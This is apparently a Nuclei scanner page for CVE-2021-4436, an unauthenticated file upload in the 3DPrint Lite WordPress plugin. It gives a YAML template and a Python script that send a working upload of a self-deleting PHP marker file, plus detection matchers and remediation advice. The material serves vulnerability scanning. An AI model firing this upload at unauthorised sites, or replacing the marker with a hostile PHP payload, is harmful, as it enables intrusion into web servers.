3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
ID: CVE-2021-4436
Severity: critical
Author: s4e-io
Tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
Description
Description
The plugin performs no authorisation check and does not validate the uploaded file in its p3dlite_handle_upload AJAX action, allowing unauthenticated users to upload arbitrary files to the web server. However, a .htaccess prevents the uploaded files from being accessed on web servers that honour it, such as Apache; servers that ignore .htaccess files (nginx, for example) offer no such protection, so the impact depends on the deployment.
YAML Source

```yaml
id: CVE-2021-4436

info:
  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
  author: s4e-io
  severity: critical
  description: |
    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
  remediation: Fixed in 1.9.1.5
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4436
    cwe-id: CWE-434
    epss-score: 0.00412
    epss-percentile: 0.73863
    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp3dprinting
    product: 3dprint_lite
    framework: wordpress
    publicwww-query: "/wp-content/plugins/3dprint-lite/"
  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: text/php

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jsonrpc":"2.0"'
          - '"filename":'
          - "{{filename}}.php"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202840842ba665b89e421db47e1677ae4c87d26adb4b67a3ae6174ed9b97ce9e2102203bd32a87b899ce873580c478d31e5f112d71e8e886a7e27c120caaab5893ca44:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template sends the multipart upload request above with Nuclei and reports the target as vulnerable only when the response has status 200 and its body contains all three matcher words (the JSON-RPC version, a filename field, and the random filename that was uploaded). Run it against a target with:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-4436.yaml"
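The check the template performs, as an added stand-alone Python example (not code from the template, the plugin or the WPScan advisory): it builds the same multipart request and applies the same word/status matchers, so the decision logic can be inspected offline. The sample JSON-RPC bodies are constructed to exercise the matcher and are not captured from a real target; the function names (build_multipart, matches, probe, demo) are this example's own.

```python
"""Offline reproduction of the CVE-2021-4436 Nuclei check.

Added example, not part of the template or the plugin: it builds the same
multipart POST to /wp-admin/admin-ajax.php that the template sends and applies
the template's matcher logic to a response. probe() performs the real request
when given a URL; everything else runs without a target.
"""
import random
import string
from http.client import HTTPConnection, HTTPSConnection
from urllib.parse import urlparse

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "p3dlite_handle_upload"  # unauthenticated AJAX action named in the advisory
BOUNDARY = "---------------------------54331109111293931601238262353"  # same as the template


def random_alpha(n: int) -> str:
    """Equivalent of the template's to_lower(rand_text_alpha(n))."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(n))


def build_multipart(marker: str, filename: str, boundary: str = BOUNDARY) -> tuple[bytes, str]:
    """Return (body, content_type) carrying the template's two form parts.

    The PHP payload echoes the marker and removes itself (unlink(__FILE__)), so
    it leaves nothing behind if the server ever executes it.
    """
    php = f'<?php echo "{marker}";unlink(__FILE__);?>'
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="action"\r\n\r\n'
        f"{ACTION}\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}.php"\r\n'
        "Content-Type: text/php\r\n\r\n"
        f"{php}\r\n"
        f"--{boundary}--\r\n"
    )
    return body.encode(), f"multipart/form-data; boundary={boundary}"


def matches(status: int, body: str, filename: str) -> bool:
    """Template matchers: status 200 AND all three words present in the body.

    Nuclei word matching is a plain substring test, so '"jsonrpc":"2.0"' must
    appear with no whitespace, exactly as written in the template.
    """
    words = ('"jsonrpc":"2.0"', '"filename":', f"{filename}.php")
    return status == 200 and all(w in body for w in words)


def probe(url: str, timeout: float = 10.0) -> tuple[bool, int, str]:
    """Send the check to a live target; returns (vulnerable, status, body).

    Only use against systems you are authorised to test. The request writes a
    file into the upload directory, and unlink(__FILE__) only runs if PHP
    serves that file, so when .htaccess blocks access the file stays on disk.
    """
    marker, filename = random_alpha(10), random_alpha(5)
    body, content_type = build_multipart(marker, filename)
    u = urlparse(url)
    conn_cls = HTTPSConnection if u.scheme == "https" else HTTPConnection
    conn = conn_cls(u.netloc, timeout=timeout)
    conn.request("POST", AJAX_PATH, body=body,
                 headers={"Content-Type": content_type, "Content-Length": str(len(body))})
    resp = conn.getresponse()
    text = resp.read().decode(errors="replace")
    return matches(resp.status, text, filename), resp.status, text


# Constructed sample responses (not captured from a real target) to exercise matches().
SAMPLE_FILENAME = "abcde"
ACCEPTED_BODY = '{"jsonrpc":"2.0","result":{"filename":"abcde.php"},"id":"id"}'
REJECTED_BODY = '{"jsonrpc":"2.0","error":{"code":104,"message":"Upload rejected"},"id":"id"}'


def demo() -> dict[str, bool]:
    """Run the matcher over the constructed responses."""
    return {
        "accepted_upload": matches(200, ACCEPTED_BODY, SAMPLE_FILENAME),
        "rejected_upload": matches(200, REJECTED_BODY, SAMPLE_FILENAME),
        "wrong_status": matches(400, ACCEPTED_BODY, SAMPLE_FILENAME),
        "wrong_filename": matches(200, ACCEPTED_BODY, "zzzzz"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The matcher only confirms that the upload was accepted; it says nothing about whether the file can be executed. As the description notes, a .htaccess may block access on Apache while nginx ignores .htaccess, so a positive result needs a manual follow-up request to the uploaded file before it is treated as remote code execution, and the uploaded file should be removed afterwards if the self-deleting payload never ran.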